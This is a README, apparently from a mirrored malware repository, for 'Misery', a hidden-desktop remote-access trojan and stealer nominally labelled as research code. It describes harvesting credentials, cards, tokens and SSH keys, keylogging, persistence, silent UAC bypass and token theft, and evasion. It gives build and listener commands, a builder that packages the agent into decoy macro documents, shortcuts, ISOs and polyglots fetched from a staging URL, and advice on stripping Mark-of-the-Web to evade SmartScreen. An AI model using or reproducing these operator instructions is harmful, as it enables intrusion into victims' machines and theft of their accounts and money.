Misery + HVNC

Misery
a devoted sister of the Church of Malware

HVNC RAT and stealer research project, derived from Misery. For local testing and research only.

Features

  • Hidden desktop (hvnc start): GDI apps on a hidden desktop, streamed live
  • Interactive browser (hvnc launch chrome): real Chromium with the victim's logins, driven over CDP
  • Ghosted browser (ghost <url>): hidden Chrome/Edge session using the victim's cookies and logins
  • Credential harvesting: Chrome, Edge, Brave, Opera, Opera GX, Firefox
  • App-session harvesting: payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH keys, Wi-Fi passwords, wallet extension paths, Signal session listing
  • Encrypted C2 channel: reverse TCP (default) or HTTPS beaconing through a CDN
  • Payload builder (setup.py): msfvenom-style config, ECDH key handling, and -p delivery wrappers for docm, xlsm, pptm, lnk, pdf, html, iso, polyglot_exe_zip, and polyglot_html
  • Keylogger and clipboard monitoring
  • Persistence: HKCU Run key and WMI event subscriptions
  • Elevation (elevate): silent UAC bypass to High via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL system process. Verified on Windows 11 25H2 (build 26200)
  • Anti-analysis: user-mode environment checks, reflective injection

Misery operator view

VirusTotal

VirusTotal scan result

Quick start

setup.py writes src/config.h, saves the console's ECDH key to .misery_key, and builds the project:

python setup.py -g                                        # interactive
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent   # non-interactive

Run the console listener, then the agent:

.\build\console.exe
.\build\agent.exe

Type help in the console for the full command list.

Payload wrappers

The builder (setup.py -p <formats>) packages the agent into delivery filetypes in dist/ and records each one in <out>.manifest.json with its sha256 and size. python setup.py --list-formats prints the current list with dependencies.

  • docm - Word macro document; Document_Open runs a PowerShell cradle
  • xlsm - Excel macro workbook; Workbook_Open runs a PowerShell cradle
  • pptm - PowerPoint macro deck; Auto_Open runs a PowerShell cradle
  • lnk - shortcut; a hidden PowerShell opens an embedded decoy PDF, then fetches and runs the agent
  • pdf - agent embedded as a PDF attachment, launched on open
  • html - OneDrive-style page; the agent hides in a zip blob behind a button click
  • iso - ISO with the agent inside, sidesteps MOTW
  • polyglot_exe_zip - runs as an exe, opens as a zip holding a document.pdf.lnk
  • polyglot_html - runs as an exe, shows a decoy page in a browser
python setup.py -t tcp LHOST=10.0.0.5 LPORT=4444 -p docm,iso -o misery STAGE_URL=http://10.0.0.5:8080/misery.exe

-p all builds every format. The macro and lnk formats fetch the agent from STAGE_URL when the target opens them; pdf, html, iso, and the polyglots carry the agent themselves. The macro files ship with decoy content, and the lnk/pdf formats show a decoy document, so they read as normal business documents instead of empty templates.

Delivery note: browsers tag downloaded files with the Mark-of-the-Web (Zone.Identifier), which trips SmartScreen on macros and executables. Extract a container with 7-Zip or WinRAR to drop the MOTW (Explorer itself propagates it), so the iso wrapper or archiver extraction is the practical route for the macro and exe formats; the pdf and html formats are fine to serve straight from a browser.

The wrappers use these optional libs; a missing lib just skips the formats that need it:

pip install pyopenvba pylnk3 pycdlib pikepdf python-docx openpyxl python-pptx

Commands

Command What it does
steal run credential and session harvesting
elevate silently relaunch the agent as admin; the new instance registers as elevated
hvnc start / hvnc stop start or stop the hidden desktop session
hvnc launch [path] launch an app (default Chrome) on the hidden desktop
hvnc quality [10-100] set streamed frame JPEG quality
ghost <url> open a URL in a ghosted hidden browser
ghost nav <url> navigate the ghost browser
ghost stop stop the ghost session
keylog toggle the keylogger
clip read the victim's clipboard
clear / exit clear the terminal / quit

Build

Requires cmake and a C++ toolchain (MSVC, MinGW, or Clang).

MSVC:

cmake -S . -B build -G "Visual Studio 17 2022" -A x64
cmake --build build --config Release

MinGW:

cmake -S . -B build -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release
cmake --build build -j 4

A fresh checkout builds against 127.0.0.1:4444. Run setup.py once so .misery_key exists.

Layout

  • src/agent: entry, C2 client, injector, persistence
  • src/console: operator console + listener
  • src/payload: payload DLL, reflective loader, trampoline
  • src/stealer: Misery-derived sources
  • src/hvnc: hidden-desktop session
  • src/ghost: ghosted browser session
  • src/browser: CDP client (Page/Input over WebSocket)
  • src/rat: keylogger + clipboard
  • src/transport: encrypted TCP framing, HTTPS beacon carrier, compression
  • src/evasion: indirect syscalls, anti-analysis, UAC/token elevation, helpers
  • build/: out-of-source build dir

Licence

No licence granted. Research code for study only; not licensed for redistribution or commercial use.

S
Description
Automated archival mirror of churchofmalware.org/JYenn/Misery
Readme
19 MiB
Languages
C++ 87.5%
Python 10.5%
CMake 0.9%
Assembly 0.8%
C 0.3%